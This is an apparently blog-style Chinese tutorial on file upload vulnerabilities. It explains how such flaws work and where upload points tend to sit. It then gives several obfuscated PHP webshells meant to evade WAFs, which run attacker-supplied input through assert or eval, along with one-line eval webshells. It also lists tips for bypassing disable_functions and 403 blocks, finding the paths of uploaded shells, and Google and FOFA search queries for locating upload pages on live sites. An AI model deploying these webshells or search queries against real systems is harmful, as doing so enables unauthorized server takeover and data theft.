3.1_文件上传漏洞

文件上传漏洞


  1. 文件上传漏洞原理:未对用户提交的文件进行严格校验,就将恶意文件解析执行,导致用户可以提交恶意的文件进行攻击;

  2. 利用方式(危害):

    1). 上传 HTML/SVG 进行 XSS 攻击,窃取 Cookie ;(CSRF + XSS

    2). 上传 Webshell 文件 Getshell;( Webshell 文件:phpaspjsp等 )

    3). 上传 Docx 宏病毒文件,对数据进行 窃取和破坏;

  3. 可能存在的文件上传的功能点(文资留商用)

    1) . 文件编辑处 文件上传;

    2) . 资料认证处 文件上传;

    3) . 留言评论处 文件上传;

    4) . 商品编辑处 文件上传;

    5) . 用户信息处 文件上传;

绕过方式


文件上传绕WAF:免杀webshell


<?php
$a = substr_replace("assexx","rt",4);
$b=[''→$a($_POST['q'])];
?>

<?php
$a = $_GET['A'];
$b = $_POST['B'];
$a($b);
?>

<?php
$a ="a";
$s ="s";
$c=$a.$s."sert";
foreach(array('_GET') as $r){
foreach($$r as $k => $v){
$c($v);
}}
?>

# 参数名=phpinfo();
# <?php phpinfo();@Eval($_POST[1]);?>
# <? @eval($_POST[1]); ?>

其他


  1. 网站设置了 Disable_functions 如何进行绕过?
    1). 作用:限制命令执行;
    2). 绕过:蚁剑/哥斯拉上安装插件进行绕过;
  2. 为什么上传了恶意文件,但连接不上 ?
    1). 恶意文件内容有误;
    2). 上传的恶意文件无法被解析;
    3). 当前目录不能执行脚本文件;
    4). 安全设备进行了拦截;
  3. 为什么可以正常访问图片,但访问上传脚本显示403?
    1). 当前目录不能执行脚本文件;
    2). 安全设备进行了拦截;
  4. 绕过403工具:403ByPassser-master,X-Forwarded-For 插件
  5. 脚本上传后,如何找到其路径?
    1). 上传页面F12查看源码;
    2). Brup抓包,查看是否泄露了其上传路径;
    3). 查看网站图片路径,试着修改文件名,看图片目录下是否存在上传文件;
    4). 通过目录扫描寻找可疑的目录;
  6. Google语法:inurl:upload.php , intitle="未选择文件"
  7. FOFA语法:title="upload"

免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!

相关推荐
EasyNVR38 分钟前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash3 小时前
【D01】网络安全概论
网络·安全·web安全·php
阿龟在奔跑5 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang5 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang5 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
好想打kuo碎5 小时前
1、HCIP之RSTP协议与STP相关安全配置
网络·安全
周全全5 小时前
Spring Boot + Vue 基于 RSA 的用户身份认证加密机制实现
java·vue.js·spring boot·安全·php
Mr.Pascal6 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
风间琉璃""7 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制